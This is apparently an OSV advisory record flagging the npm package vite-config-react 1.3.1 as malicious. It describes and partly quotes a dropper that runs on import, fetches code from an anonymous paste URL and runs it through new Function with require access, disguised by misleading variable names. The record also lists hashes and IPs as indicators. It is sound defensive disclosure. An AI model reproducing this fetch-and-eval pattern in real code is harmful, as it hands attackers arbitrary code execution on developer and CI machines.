{"id":"MAL-2026-5728","summary":"Malicious code in vite-config-react (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552)\nOn `require`/`import` of the package, the entrypoint chain src/index.js → core/createConfig.js → features/plugins.js side-effect-imports features/extras/config.js, which runs an IIFE that performs `axios.get('https://www.jsonkeeper.com/b/AAON3', { headers: { 'x-secret-key': '_' } })`, reads `.data.config` from the response, and executes the returned string via `new Function('require', s)(require)` with a Node `require` constructed through `createRequire(import.meta.url)`. The fetch-and-eval is wrapped in a 5-attempt retry loop with a swallowed try/catch. The dropper additionally shadows the global `process` with a local object whose keys are renamed `DEV_API_KEY`, `DEV_SECRET_KEY`, `DEV_SECRET_VALUE` so the hardcoded URL and header read like ordinary environment-variable lookups, and the wrapper function is named `getCallers` to obscure intent. jsonkeeper.com is an anonymous, mutable paste host with no hash pinning — the operator can swap the executed payload at any time.\nAny project that imports this package (for example in `vite.config.js`) hands the author arbitrary code execution on the developer's or CI machine with full `require` access.\n","modified":"2026-06-13T04:01:39.754380646Z","published":"2026-06-13T03:04:40Z","database_specific":{"malicious-packages-origins":[{"sha256":"79ca138b0d54ede570dc5fdf43ecaa2f258dcdc0020f80d4bfeb708985c1766a","source":"amazon-inspector","import_time":"2026-06-13T03:48:10.94307621Z","versions":["1.3.1"],"id":"IN-MAL-2026-006278","modified_time":"2026-06-13T03:04:41Z"},{"sha256":"d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552","source":"amazon-inspector","import_time":"2026-06-13T03:48:10.908991108Z","versions":["1.3.1"],"id":"IN-MAL-2026-006277","modified_time":"2026-06-13T03:04:40Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/vite-config-react/v/1.3.1"}],"affected":[{"package":{"name":"vite-config-react","ecosystem":"npm","purl":"pkg:npm/vite-config-react"},"versions":["1.3.1"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"d100938f64c4cc264fd29a4a56d67132ec0d894e860cbfffd4b2fb62f0432422","path":"src/features/extras/config.js","tlsh":"0b01bd8fa1ac140c057013e7bb1be036f662b1ab390381d5775cc7521fb695ca602ede"}],"ips":["104.16.10.34","10.1.0.2"],"package_integrity":[{"hashes":{"sha1":"9b378c94ab42d52c4db2e846469a5a66eb3ffcd7","sha512_sri":"sha512-Sy3nR070BFXXj2wm0QjV3lsALhP2ZWKWAU5qakxstWihAGhtdrC+FFLN1WJzehtadNyXTUU0l1Z7Srv2+AV8KA=="},"filename":"vite-config-react-1.3.1.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-config-react/MAL-2026-5728.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}